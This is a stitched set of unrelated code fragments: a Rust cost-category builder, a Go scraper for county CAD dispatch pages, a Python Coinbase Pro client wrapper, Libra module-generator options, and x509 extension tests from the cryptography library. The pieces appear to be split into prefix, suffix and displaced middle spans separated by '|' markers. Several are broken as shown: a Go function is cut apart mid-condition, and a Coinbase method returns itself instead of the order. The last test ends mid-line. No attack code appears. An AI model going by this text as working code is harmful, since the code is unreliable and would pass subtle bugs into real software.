            let mut v = self.processing_status.unwrap_or_default();
            v.push(input.into());
            self.processing_status = Some(v);
            self
        }
        /// Replaces the whole [`processing_status`](Self::processing_status) collection.
        pub fn set_processing_status(
            mut self,
            input: std::option::Option<std::vec::Vec<crate::model::CostCategoryProcessingStatus>>,
        ) -> Self {
            self.processing_status = input;
            self
        }
        /// <p>The
        /// default value for the cost category.</p>
        pub fn default_value(mut self, input: impl Into<std::string::String>) -> Self {
            self.default_value = Some(input.into());
            self
        }
        /// Sets [`default_value`](Self::default_value), replacing any stored value.
        pub fn set_default_value(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.default_value = input;
            self
        }
        /// Consumes the builder and constructs a [`CostCategory`](crate::model::CostCategory)
        pub fn build(self) -> crate::model::CostCategory {
            crate::model::CostCategory {
                cost_category_arn: self.cost_category_arn,
                effective_start: self.effective_start,
                effective_end: self.effective_end,
                name: self.name,
                rule_version: self.rule_version,
                rules: self.rules,
                split_charge_rules: self.split_charge_rules,
                processing_status: self.processing_status,
                default_value: self.default_value,
            }
        }
    }
}
impl CostCategory {
    /// Creates a new builder-style object to manufacture [`CostCategory`](crate::model::CostCategory)
    // Every field of the returned builder starts as `None` (derived `Default`).
    pub fn builder() -> crate::model::cost_category::Builder {
        crate::model::cost_category::Builder::default()
    }
}
| _str(s: |
parse.go | package parse
import (
"encoding/json"
"golang.org/x/net/html"
"log"
"strings"
"time"
)
// DB is an in-memory snapshot of scraped data.
//
// NOTE(review): neither field is written or read anywhere in this file;
// presumably r maps a call key to its raw detail string and v holds raw
// rows — confirm against the package's callers before relying on this.
type DB struct {
	r map[string]string
	v []string
}
// Tag parses the HTML document in s and collects anchor hrefs into two
// groups: links containing "map.asp?type=" and links containing
// "livecad". It returns both lists along with any HTML parse error.
func Tag(s string) ([]string, []string, error) {
	mapLinks := []string{}
	liveLinks := []string{}
	doc, err := html.Parse(strings.NewReader(s))
	if err != nil {
		return mapLinks, liveLinks, err
	}
	var walk func(*html.Node)
	walk = func(node *html.Node) {
		if node.Type == html.ElementNode && node.Data == "a" {
			for _, attr := range node.Attr {
				if attr.Key != "href" {
					continue
				}
				// Only the first href attribute of each anchor is inspected.
				switch {
				case strings.Contains(attr.Val, "map.asp?type="):
					mapLinks = append(mapLinks, attr.Val)
				case strings.Contains(attr.Val, "livecad"):
					liveLinks = append(liveLinks, attr.Val)
				}
				break
			}
		}
		for child := node.FirstChild; child != nil; child = child.NextSibling {
			walk(child)
		}
	}
	walk(doc)
	return mapLinks, liveLinks, nil
}
// Strip normalizes the query fragment in s (via CleanUp) and parses it
// into a key/value map. Pairs are separated by '&' and split on the
// FIRST '=' only, so values that themselves contain '=' are preserved.
// Fragments without any '=' are ignored.
func Strip(s string) map[string]string {
	m := map[string]string{}
	for _, pair := range strings.Split(CleanUp(s), "&") {
		// SplitN keeps '=' characters inside the value intact; the
		// previous Split + len==2 check silently dropped such pairs.
		kv := strings.SplitN(pair, "=", 2)
		if len(kv) == 2 {
			m[kv[0]] = kv[1]
		}
	}
	return m
}
// CleanUp rewrites the scraped CAD URL/text fragment into a compact
// query form: long page prefixes are shortened to their parameter name
// and HTML line breaks / " @ " separators are collapsed to spaces.
// Substitutions are applied sequentially, in declaration order.
func CleanUp(s string) string {
	for _, sub := range [][2]string{
		{"livecadcomments-fireems.asp?eid", "eid"},
		{"map.asp?type", "type"},
		{"<br>", " "},
		{" @ ", " "},
	} {
		s = strings.ReplaceAll(s, sub[0], sub[1])
	}
	return s
}
// GetDetail builds the absolute CAD-detail URL for the given relative
// page reference, percent-encoding embedded spaces (the only escaping
// the upstream pages require).
func GetDetail(purl string) string {
	const base = "https://webapp02.montcopa.org/eoc/cadinfo/"
	return strings.ReplaceAll(base+purl, " ", "%20")
}
// GetTable walks the parsed HTML document in s and collects the text of
// every <td> cell: when the cell wraps its text in <font> the inner
// text is taken, otherwise the cell's first child node's data is used.
// Scanning of a sibling run stops at the first cell whose child is a
// <b> element (a header marker in the source pages).
// Returns the collected cell texts and any HTML parse error.
func GetTable(s string) ([]string, error) {
	r := []string{}
	doc, err := html.Parse(strings.NewReader(s))
	if err != nil {
		return r, err
	}
	var f func(*html.Node)
	f = func(n *html.Node) {
		for c := n.FirstChild; c != nil; c = c.NextSibling {
			if c.Data == "td" {
				// Guard against empty cells: the previous version
				// dereferenced c.FirstChild unconditionally and
				// panicked on <td></td>.
				if c.FirstChild != nil {
					if c.FirstChild.Data == "b" {
						// Bold child marks a header cell: stop this run.
						return
					}
					if c.FirstChild.Data == "font" {
						if c.FirstChild.FirstChild != nil {
							r = append(r, c.FirstChild.FirstChild.Data)
						}
					} else {
						r = append(r, c.FirstChild.Data)
					}
				}
			}
			f(c)
		}
	}
	f(doc)
	return r, nil
}
func GetTableV2(s string) ([]string, error) {
doc, err := html.Parse(strings.NewReader(s))
r := []string{}
if err != nil {
return r, err
}
var f func(*html.Node)
f = func(n *html.Node) {
if n.Type == html.ElementNode && n.Data == "table" {
}
for c := n.FirstChild; c != nil; c = c.NextSibling {
if c.Data == "td" {
if c.FirstChild.Data == "b" |
if c.FirstChild.Data == "font" {
r = append(r, c.FirstChild.FirstChild.Data)
} else {
r = append(r, c.FirstChild.Data)
}
}
f(c)
}
}
f(doc)
return r, nil
}
// ToJson pairs each call map with its status rows and marshals the
// result, stamped with the current time, as JSON. When fewer status
// rows than calls are supplied the shortfall is logged and padded with
// empty slices so indexes stay aligned.
func ToJson(call []map[string]string, status [][]string) ([]byte, error) {
	type Calls struct {
		Call   map[string]string
		Status []string
	}
	type DB struct {
		Calls     []*Calls
		TimeStamp time.Time
	}
	if len(status) < len(call) {
		log.Printf("len(status) < len(call)\n")
		for len(status) < len(call) {
			status = append(status, []string{})
		}
	}
	calls := make([]*Calls, 0, len(call))
	for i := range call {
		calls = append(calls, &Calls{Call: call[i], Status: status[i]})
	}
	return json.Marshal(DB{calls, time.Now()})
}
| {
//c = c.FirstChild
return
} |
Coinbase.py | import cbpro
import pandas as pd
from base64 import b64encode
class Coinbase:
    def __init__(self, API_KEY, API_SECRET, API_PASS, ENV_URL="https://api-public.sandbox.pro.coinbase.com"):
        """Create an authenticated cbpro client and keep the credentials.

        Args:
            API_KEY: Coinbase Pro API key.
            API_SECRET: API secret for the key.
            API_PASS: API passphrase.
            ENV_URL: REST endpoint; defaults to the public sandbox, so
                pass the production URL explicitly for live trading.
        """
        self.API_KEY = API_KEY
        self.API_SECRET = API_SECRET
        self.API_PASS = API_PASS
        self.ENV_URL = ENV_URL
        self.client = cbpro.AuthenticatedClient(self.API_KEY, self.API_SECRET, self.API_PASS, api_url=self.ENV_URL)
def | (self):
print('Authenticating Coinbase')
def place_market(self, action, ticker, amount):
order = self.client.place_market_order(
product_id=ticker,
side=action,
funds=amount
)
return place_market
    def place_limit_order(self, action, ticker, entry_price, size):
        """Place a limit order via the cbpro client and echo the response.

        Args:
            action: Order side, e.g. "buy" or "sell".
            ticker: Product id such as "BTC-USD".
            entry_price: Limit price for the order.
            size: Base-currency order size.

        Returns:
            The response returned by ``place_limit_order``.
        """
        entry_order = self.client.place_limit_order(product_id=ticker,
                                                    side=action,
                                                    price=entry_price,
                                                    size=size)
        # Echo the raw response for interactive/debug use.
        print(entry_order)
        return entry_order
    def get_accounts(self):
        """Return the account list from the cbpro client."""
        return self.client.get_accounts()
    def orders(self):
        """Return open orders from the cbpro client."""
        return self.client.get_orders()
    def fills(self):
        """Return recent fills from the cbpro client."""
        return self.client.get_fills()
    def historical_rates(self, ticker: str):
        """Fetch daily candles (granularity=86400 seconds) for ``ticker``.

        Returns:
            A pandas DataFrame with columns
            time/low/high/open/close/volume, one row per candle.
        """
        rates = self.client.get_product_historic_rates(ticker, granularity=86400)
        df = pd.DataFrame(rates, columns=["time","low","high","open","close","volume"])
        return df
| auth |
options.rs | // Copyright (c) The Libra Core Contributors
// SPDX-License-Identifier: Apache-2.0
//! Defines constants and options that are used for module generation
#[derive(Clone, Debug)]
pub struct ModuleGeneratorOptions {
    /// The maximum number of locals that can be defined within a generated function definition.
    pub max_locals: usize,
    /// The maximum number of fields that will be generated for any struct.
    pub max_fields: usize,
    /// The minimum number of fields that will be generated for any struct.
    pub min_fields: usize,
    /// The maximum number of structs that can be generated for a module
    pub max_structs: usize,
    /// The maximum number of functions that can be generated for a module.
    pub max_functions: usize,
    /// The maximum number of type parameters for functions and structs.
    pub max_ty_params: usize,
    /// The maximum size that generated byte arrays can be.
    pub byte_array_max_size: usize,
    /// The maximum size that a generated string can be.
    pub max_string_size: usize,
    /// The maximum number of arguments to generated function definitions.
    pub max_function_call_size: usize,
    /// The maximum number of return types of generated function definitions.
    pub max_ret_types_size: usize,
    /// Whether or not generate modules should only contain simple (non-reference, or nested
    /// struct) types.
    pub simple_types_only: bool,
    /// Whether the generated modules should have any resources declared.
    pub add_resources: bool,
    /// The minimum number of entries in any table
    pub min_table_size: usize,
}
impl Default for ModuleGeneratorOptions {
fn default() -> Self |
}
| {
Self {
min_fields: 1,
max_locals: 10,
max_fields: 20,
max_structs: 100,
max_functions: 100,
max_ty_params: 5,
byte_array_max_size: 64,
max_string_size: 32,
max_function_call_size: 23,
max_ret_types_size: 4,
simple_types_only: false,
add_resources: true,
min_table_size: 1,
}
} |
test_x509_ext.py | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
import binascii
import datetime
import ipaddress
import os
import typing
import pretend
import pytest
from cryptography import x509
from cryptography.hazmat.backends.interfaces import (
DSABackend,
EllipticCurveBackend,
RSABackend,
X509Backend,
)
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.x509 import DNSName, NameConstraints, SubjectAlternativeName
from cryptography.x509.extensions import _key_identifier_from_public_key
from cryptography.x509.oid import (
AuthorityInformationAccessOID,
ExtendedKeyUsageOID,
ExtensionOID,
NameOID,
ObjectIdentifier,
SubjectInformationAccessOID,
_OID_NAMES,
)
from .test_x509 import _load_cert
from ..hazmat.primitives.fixtures_rsa import RSA_KEY_2048
from ..hazmat.primitives.test_ec import _skip_curve_unsupported
from ..utils import load_vectors_from_file
def _make_certbuilder(private_key):
    """Return a CertificateBuilder pre-populated with a fixed self-signed
    identity (CN=example.org, serial 777, valid 1999-2020), ready for a
    test to add extensions and sign with ``private_key``."""
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "example.org")])
    return (
        x509.CertificateBuilder()
        .subject_name(name)
        .issuer_name(name)
        .public_key(private_key.public_key())
        .serial_number(777)
        .not_valid_before(datetime.datetime(1999, 1, 1))
        .not_valid_after(datetime.datetime(2020, 1, 1))
    )
class TestExtension(object):
def test_not_an_oid(self):
bc = x509.BasicConstraints(ca=False, path_length=None)
with pytest.raises(TypeError):
x509.Extension("notanoid", True, bc) # type:ignore[arg-type]
def test_critical_not_a_bool(self):
bc = x509.BasicConstraints(ca=False, path_length=None)
with pytest.raises(TypeError):
x509.Extension(
ExtensionOID.BASIC_CONSTRAINTS,
"notabool", # type:ignore[arg-type]
bc,
)
def test_repr(self):
bc = x509.BasicConstraints(ca=False, path_length=None)
ext = x509.Extension(ExtensionOID.BASIC_CONSTRAINTS, True, bc)
assert repr(ext) == (
"<Extension(oid=<ObjectIdentifier(oid=2.5.29.19, name=basicConst"
"raints)>, critical=True, value=<BasicConstraints(ca=False, path"
"_length=None)>)>"
)
def test_eq(self):
ext1 = x509.Extension(
x509.ObjectIdentifier("1.2.3.4"),
False,
x509.BasicConstraints(ca=False, path_length=None),
)
ext2 = x509.Extension(
x509.ObjectIdentifier("1.2.3.4"),
False,
x509.BasicConstraints(ca=False, path_length=None),
)
assert ext1 == ext2
def test_ne(self):
ext1 = x509.Extension(
x509.ObjectIdentifier("1.2.3.4"),
False,
x509.BasicConstraints(ca=False, path_length=None),
)
ext2 = x509.Extension(
x509.ObjectIdentifier("1.2.3.5"),
False,
x509.BasicConstraints(ca=False, path_length=None),
)
ext3 = x509.Extension(
x509.ObjectIdentifier("1.2.3.4"),
True,
x509.BasicConstraints(ca=False, path_length=None),
)
ext4 = x509.Extension(
x509.ObjectIdentifier("1.2.3.4"),
False,
x509.BasicConstraints(ca=True, path_length=None),
)
assert ext1 != ext2
assert ext1 != ext3
assert ext1 != ext4
assert ext1 != object()
def test_hash(self):
ext1 = x509.Extension(
ExtensionOID.BASIC_CONSTRAINTS,
False,
x509.BasicConstraints(ca=False, path_length=None),
)
ext2 = x509.Extension(
ExtensionOID.BASIC_CONSTRAINTS,
False,
x509.BasicConstraints(ca=False, path_length=None),
)
ext3 = x509.Extension(
ExtensionOID.BASIC_CONSTRAINTS,
False,
x509.BasicConstraints(ca=True, path_length=None),
)
assert hash(ext1) == hash(ext2)
assert hash(ext1) != hash(ext3)
class TestTLSFeature(object):
def test_not_enum_type(self):
with pytest.raises(TypeError):
x509.TLSFeature([3]) # type:ignore[list-item]
def test_empty_list(self):
with pytest.raises(TypeError):
x509.TLSFeature([])
def test_repr(self):
ext1 = x509.TLSFeature([x509.TLSFeatureType.status_request])
assert repr(ext1) == (
"<TLSFeature(features=[<TLSFeatureType.status_request: 5>])>"
)
def test_eq(self):
ext1 = x509.TLSFeature([x509.TLSFeatureType.status_request])
ext2 = x509.TLSFeature([x509.TLSFeatureType.status_request])
assert ext1 == ext2
def test_ne(self):
ext1 = x509.TLSFeature([x509.TLSFeatureType.status_request])
ext2 = x509.TLSFeature([x509.TLSFeatureType.status_request_v2])
ext3 = x509.TLSFeature(
[
x509.TLSFeatureType.status_request,
x509.TLSFeatureType.status_request_v2,
]
)
assert ext1 != ext2
assert ext1 != ext3
assert ext1 != object()
def test_hash(self):
ext1 = x509.TLSFeature([x509.TLSFeatureType.status_request])
ext2 = x509.TLSFeature([x509.TLSFeatureType.status_request])
ext3 = x509.TLSFeature(
[
x509.TLSFeatureType.status_request,
x509.TLSFeatureType.status_request_v2,
]
)
assert hash(ext1) == hash(ext2)
assert hash(ext1) != hash(ext3)
def test_iter(self):
ext1_features = [x509.TLSFeatureType.status_request]
ext1 = x509.TLSFeature(ext1_features)
assert len(ext1) == 1
assert list(ext1) == ext1_features
ext2_features = [
x509.TLSFeatureType.status_request,
x509.TLSFeatureType.status_request_v2,
]
ext2 = x509.TLSFeature(ext2_features)
assert len(ext2) == 2
assert list(ext2) == ext2_features
def test_indexing(self):
ext = x509.TLSFeature(
[
x509.TLSFeatureType.status_request,
x509.TLSFeatureType.status_request_v2,
]
)
assert ext[-1] == ext[1]
assert ext[0] == x509.TLSFeatureType.status_request
class TestUnrecognizedExtension(object):
    """Tests for x509.UnrecognizedExtension: constructor validation,
    equality, hashing and repr."""

    def test_invalid_oid(self):
        # A non-ObjectIdentifier oid must be rejected.
        with pytest.raises(TypeError):
            x509.UnrecognizedExtension(
                "notanoid", b"somedata"  # type:ignore[arg-type]
            )

    def test_eq(self):
        ext1 = x509.UnrecognizedExtension(
            x509.ObjectIdentifier("1.2.3.4"), b"\x03\x02\x01"
        )
        ext2 = x509.UnrecognizedExtension(
            x509.ObjectIdentifier("1.2.3.4"), b"\x03\x02\x01"
        )
        assert ext1 == ext2

    def test_ne(self):
        # Differ by value, by oid, and against an unrelated type.
        ext1 = x509.UnrecognizedExtension(
            x509.ObjectIdentifier("1.2.3.4"), b"\x03\x02\x01"
        )
        ext2 = x509.UnrecognizedExtension(
            x509.ObjectIdentifier("1.2.3.4"), b"\x03\x02\x02"
        )
        ext3 = x509.UnrecognizedExtension(
            x509.ObjectIdentifier("1.2.3.5"), b"\x03\x02\x01"
        )
        assert ext1 != ext2
        assert ext1 != ext3
        assert ext1 != object()

    def test_repr(self):
        ext1 = x509.UnrecognizedExtension(
            x509.ObjectIdentifier("1.2.3.4"), b"\x03\x02\x01"
        )
        assert repr(ext1) == (
            "<UnrecognizedExtension(oid=<ObjectIdentifier(oid=1.2.3.4, "
            "name=Unknown OID)>, value=b'\\x03\\x02\\x01')>"
        )

    def test_hash(self):
        # Equal extensions hash equal; a different oid should not collide.
        ext1 = x509.UnrecognizedExtension(
            x509.ObjectIdentifier("1.2.3.4"), b"\x03\x02\x01"
        )
        ext2 = x509.UnrecognizedExtension(
            x509.ObjectIdentifier("1.2.3.4"), b"\x03\x02\x01"
        )
        ext3 = x509.UnrecognizedExtension(
            x509.ObjectIdentifier("1.2.3.5"), b"\x03\x02\x01"
        )
        assert hash(ext1) == hash(ext2)
        assert hash(ext1) != hash(ext3)
class TestCertificateIssuer(object):
def test_iter_names(self):
ci = x509.CertificateIssuer(
[x509.DNSName("cryptography.io"), x509.DNSName("crypto.local")]
)
assert len(ci) == 2
assert list(ci) == [
x509.DNSName("cryptography.io"),
x509.DNSName("crypto.local"),
]
def test_indexing(self):
ci = x509.CertificateIssuer(
[
x509.DNSName("cryptography.io"),
x509.DNSName("crypto.local"),
x509.DNSName("another.local"),
x509.RFC822Name("[email protected]"),
x509.UniformResourceIdentifier("http://another.local"),
]
)
assert ci[-1] == ci[4]
assert ci[2:6:2] == [ci[2], ci[4]]
def test_eq(self):
ci1 = x509.CertificateIssuer([x509.DNSName("cryptography.io")])
ci2 = x509.CertificateIssuer([x509.DNSName("cryptography.io")])
assert ci1 == ci2
def test_ne(self):
ci1 = x509.CertificateIssuer([x509.DNSName("cryptography.io")])
ci2 = x509.CertificateIssuer([x509.DNSName("somethingelse.tld")])
assert ci1 != ci2
assert ci1 != object()
def test_repr(self):
ci = x509.CertificateIssuer([x509.DNSName("cryptography.io")])
assert repr(ci) == (
"<CertificateIssuer(<GeneralNames([<DNSName(value="
"'cryptography.io')>])>)>"
)
def test_get_values_for_type(self):
ci = x509.CertificateIssuer([x509.DNSName("cryptography.io")])
names = ci.get_values_for_type(x509.DNSName)
assert names == ["cryptography.io"]
def test_hash(self):
ci1 = x509.CertificateIssuer([x509.DNSName("cryptography.io")])
ci2 = x509.CertificateIssuer([x509.DNSName("cryptography.io")])
ci3 = x509.CertificateIssuer(
[x509.UniformResourceIdentifier("http://something")]
)
assert hash(ci1) == hash(ci2)
assert hash(ci1) != hash(ci3)
class TestCRLReason(object):
    """Tests for x509.CRLReason: constructor validation, equality,
    hashing and repr."""

    def test_invalid_reason_flags(self):
        # Anything other than a ReasonFlags member must be rejected.
        with pytest.raises(TypeError):
            x509.CRLReason("notareason")  # type:ignore[arg-type]

    def test_eq(self):
        reason1 = x509.CRLReason(x509.ReasonFlags.unspecified)
        reason2 = x509.CRLReason(x509.ReasonFlags.unspecified)
        assert reason1 == reason2

    def test_ne(self):
        reason1 = x509.CRLReason(x509.ReasonFlags.unspecified)
        reason2 = x509.CRLReason(x509.ReasonFlags.ca_compromise)
        assert reason1 != reason2
        assert reason1 != object()

    def test_hash(self):
        # Equal reasons hash equal; different reasons should not collide.
        reason1 = x509.CRLReason(x509.ReasonFlags.unspecified)
        reason2 = x509.CRLReason(x509.ReasonFlags.unspecified)
        reason3 = x509.CRLReason(x509.ReasonFlags.ca_compromise)
        assert hash(reason1) == hash(reason2)
        assert hash(reason1) != hash(reason3)

    def test_repr(self):
        reason1 = x509.CRLReason(x509.ReasonFlags.unspecified)
        assert repr(reason1) == ("<CRLReason(reason=ReasonFlags.unspecified)>")
class TestDeltaCRLIndicator(object):
    """Tests for x509.DeltaCRLIndicator: constructor validation,
    equality, repr and hashing."""

    def test_not_int(self):
        # The CRL number must be an int.
        with pytest.raises(TypeError):
            x509.DeltaCRLIndicator("notanint")  # type:ignore[arg-type]

    def test_eq(self):
        delta1 = x509.DeltaCRLIndicator(1)
        delta2 = x509.DeltaCRLIndicator(1)
        assert delta1 == delta2

    def test_ne(self):
        delta1 = x509.DeltaCRLIndicator(1)
        delta2 = x509.DeltaCRLIndicator(2)
        assert delta1 != delta2
        assert delta1 != object()

    def test_repr(self):
        delta1 = x509.DeltaCRLIndicator(2)
        assert repr(delta1) == ("<DeltaCRLIndicator(crl_number=2)>")

    def test_hash(self):
        # Equal indicators hash equal; distinct numbers should not collide.
        delta1 = x509.DeltaCRLIndicator(1)
        delta2 = x509.DeltaCRLIndicator(1)
        delta3 = x509.DeltaCRLIndicator(2)
        assert hash(delta1) == hash(delta2)
        assert hash(delta1) != hash(delta3)
class TestInvalidityDate(object):
    """Tests for x509.InvalidityDate: constructor validation, equality,
    repr and hashing."""

    def test_invalid_invalidity_date(self):
        # The invalidity date must be a datetime instance.
        with pytest.raises(TypeError):
            x509.InvalidityDate("notadate")  # type:ignore[arg-type]

    def test_eq(self):
        invalid1 = x509.InvalidityDate(datetime.datetime(2015, 1, 1, 1, 1))
        invalid2 = x509.InvalidityDate(datetime.datetime(2015, 1, 1, 1, 1))
        assert invalid1 == invalid2

    def test_ne(self):
        invalid1 = x509.InvalidityDate(datetime.datetime(2015, 1, 1, 1, 1))
        invalid2 = x509.InvalidityDate(datetime.datetime(2015, 1, 1, 1, 2))
        assert invalid1 != invalid2
        assert invalid1 != object()

    def test_repr(self):
        invalid1 = x509.InvalidityDate(datetime.datetime(2015, 1, 1, 1, 1))
        assert repr(invalid1) == (
            "<InvalidityDate(invalidity_date=2015-01-01 01:01:00)>"
        )

    def test_hash(self):
        # Equal dates hash equal; a one-minute difference should not collide.
        invalid1 = x509.InvalidityDate(datetime.datetime(2015, 1, 1, 1, 1))
        invalid2 = x509.InvalidityDate(datetime.datetime(2015, 1, 1, 1, 1))
        invalid3 = x509.InvalidityDate(datetime.datetime(2015, 1, 1, 1, 2))
        assert hash(invalid1) == hash(invalid2)
        assert hash(invalid1) != hash(invalid3)
class TestNoticeReference(object):
    """Tests for x509.NoticeReference: notice-number validation,
    iterable input handling, repr, equality and hashing."""

    def test_notice_numbers_not_all_int(self):
        # Every notice number must be an int.
        with pytest.raises(TypeError):
            x509.NoticeReference(
                "org", [1, 2, "three"]  # type:ignore[list-item]
            )

    def test_notice_numbers_none(self):
        # None is not an acceptable notice-number collection.
        with pytest.raises(TypeError):
            x509.NoticeReference("org", None)  # type:ignore[arg-type]

    def test_iter_input(self):
        # A plain iterator is materialized into the stored list.
        numbers = [1, 3, 4]
        nr = x509.NoticeReference("org", iter(numbers))
        assert list(nr.notice_numbers) == numbers

    def test_repr(self):
        nr = x509.NoticeReference("org", [1, 3, 4])
        assert repr(nr) == (
            "<NoticeReference(organization='org', notice_numbers=[1, 3, 4"
            "])>"
        )

    def test_eq(self):
        nr = x509.NoticeReference("org", [1, 2])
        nr2 = x509.NoticeReference("org", [1, 2])
        assert nr == nr2

    def test_ne(self):
        # Differ by numbers, by organization, and against an unrelated type.
        nr = x509.NoticeReference("org", [1, 2])
        nr2 = x509.NoticeReference("org", [1])
        nr3 = x509.NoticeReference(None, [1, 2])
        assert nr != nr2
        assert nr != nr3
        assert nr != object()

    def test_hash(self):
        nr = x509.NoticeReference("org", [1, 2])
        nr2 = x509.NoticeReference("org", [1, 2])
        nr3 = x509.NoticeReference(None, [1, 2])
        assert hash(nr) == hash(nr2)
        assert hash(nr) != hash(nr3)
class TestUserNotice(object):
    """Tests for x509.UserNotice: notice-reference validation, repr,
    equality and hashing."""

    def test_notice_reference_invalid(self):
        # notice_reference must be a NoticeReference or None.
        with pytest.raises(TypeError):
            x509.UserNotice("invalid", None)  # type:ignore[arg-type]

    def test_notice_reference_none(self):
        # A None reference is allowed; only explicit_text is stored.
        un = x509.UserNotice(None, "text")
        assert un.notice_reference is None
        assert un.explicit_text == "text"

    def test_repr(self):
        un = x509.UserNotice(x509.NoticeReference("org", [1]), "text")
        assert repr(un) == (
            "<UserNotice(notice_reference=<NoticeReference(organization='"
            "org', notice_numbers=[1])>, explicit_text='text')>"
        )

    def test_eq(self):
        nr = x509.NoticeReference("org", [1, 2])
        nr2 = x509.NoticeReference("org", [1, 2])
        un = x509.UserNotice(nr, "text")
        un2 = x509.UserNotice(nr2, "text")
        assert un == un2

    def test_ne(self):
        # Differ by reference, by explicit text, and against another type.
        nr = x509.NoticeReference("org", [1, 2])
        nr2 = x509.NoticeReference("org", [1])
        un = x509.UserNotice(nr, "text")
        un2 = x509.UserNotice(nr2, "text")
        un3 = x509.UserNotice(nr, "text3")
        assert un != un2
        assert un != un3
        assert un != object()

    def test_hash(self):
        nr = x509.NoticeReference("org", [1, 2])
        nr2 = x509.NoticeReference("org", [1, 2])
        un = x509.UserNotice(nr, "text")
        un2 = x509.UserNotice(nr2, "text")
        un3 = x509.UserNotice(None, "text")
        assert hash(un) == hash(un2)
        assert hash(un) != hash(un3)
class TestPolicyInformation(object):
def test_invalid_policy_identifier(self):
with pytest.raises(TypeError):
x509.PolicyInformation("notanoid", None) # type:ignore[arg-type]
def test_none_policy_qualifiers(self):
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), None)
assert pi.policy_identifier == x509.ObjectIdentifier("1.2.3")
assert pi.policy_qualifiers is None
def test_policy_qualifiers(self):
pq = ["string"]
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), pq)
assert pi.policy_identifier == x509.ObjectIdentifier("1.2.3")
assert pi.policy_qualifiers == pq
def test_invalid_policy_identifiers(self):
with pytest.raises(TypeError):
x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"),
[1, 2], # type:ignore[list-item]
)
def test_iter_input(self):
qual = ["foo", "bar"]
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), iter(qual))
assert pi.policy_qualifiers is not None
assert list(pi.policy_qualifiers) == qual
def test_repr(self):
pq: typing.List[typing.Union[str, x509.UserNotice]] = [
"string",
x509.UserNotice(None, "hi"),
]
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), pq)
assert repr(pi) == (
"<PolicyInformation(policy_identifier=<ObjectIdentifier(oid=1."
"2.3, name=Unknown OID)>, policy_qualifiers=['string', <UserNo"
"tice(notice_reference=None, explicit_text='hi')>])>"
)
def test_eq(self):
pi = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"),
["string", x509.UserNotice(None, "hi")],
)
pi2 = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"),
["string", x509.UserNotice(None, "hi")],
)
assert pi == pi2
def test_ne(self):
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), ["string"])
pi2 = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"), ["string2"]
)
pi3 = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3.4"), ["string"]
)
assert pi != pi2
assert pi != pi3
assert pi != object()
def test_hash(self):
pi = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"),
["string", x509.UserNotice(None, "hi")],
)
pi2 = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"),
["string", x509.UserNotice(None, "hi")],
)
pi3 = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), None)
assert hash(pi) == hash(pi2)
assert hash(pi) != hash(pi3)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestCertificatePolicies(object):
def test_invalid_policies(self):
pq = ["string"]
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), pq)
with pytest.raises(TypeError):
x509.CertificatePolicies([1, pi]) # type:ignore[list-item]
def test_iter_len(self):
pq = ["string"]
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), pq)
cp = x509.CertificatePolicies([pi])
assert len(cp) == 1
for policyinfo in cp:
assert policyinfo == pi
def test_iter_input(self):
policies = [
x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), ["string"])
]
cp = x509.CertificatePolicies(iter(policies))
assert list(cp) == policies
def test_repr(self):
pq = ["string"]
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), pq)
cp = x509.CertificatePolicies([pi])
assert repr(cp) == (
"<CertificatePolicies([<PolicyInformation(policy_identifier=<O"
"bjectIdentifier(oid=1.2.3, name=Unknown OID)>, policy_qualifi"
"ers=['string'])>])>"
)
def test_eq(self):
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), ["string"])
cp = x509.CertificatePolicies([pi])
pi2 = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"), ["string"]
)
cp2 = x509.CertificatePolicies([pi2])
assert cp == cp2
def test_ne(self):
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), ["string"])
cp = x509.CertificatePolicies([pi])
pi2 = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"), ["string2"]
)
cp2 = x509.CertificatePolicies([pi2])
assert cp != cp2
assert cp != object()
def test_indexing(self):
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), ["test"])
pi2 = x509.PolicyInformation(x509.ObjectIdentifier("1.2.4"), ["test"])
pi3 = x509.PolicyInformation(x509.ObjectIdentifier("1.2.5"), ["test"])
pi4 = x509.PolicyInformation(x509.ObjectIdentifier("1.2.6"), ["test"])
pi5 = x509.PolicyInformation(x509.ObjectIdentifier("1.2.7"), ["test"])
cp = x509.CertificatePolicies([pi, pi2, pi3, pi4, pi5])
assert cp[-1] == cp[4]
assert cp[2:6:2] == [cp[2], cp[4]]
def test_long_oid(self, backend):
"""
Test that parsing a CertificatePolicies ext with
a very long OID succeeds.
"""
cert = _load_cert(
os.path.join("x509", "bigoid.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_class(x509.CertificatePolicies)
oid = x509.ObjectIdentifier(
"1.3.6.1.4.1.311.21.8.8950086.10656446.2706058"
".12775672.480128.147.13466065.13029902"
)
assert ext.value[0].policy_identifier == oid
def test_hash(self):
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), ["string"])
cp = x509.CertificatePolicies([pi])
pi2 = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"), ["string"]
)
cp2 = x509.CertificatePolicies([pi2])
pi3 = x509.PolicyInformation(
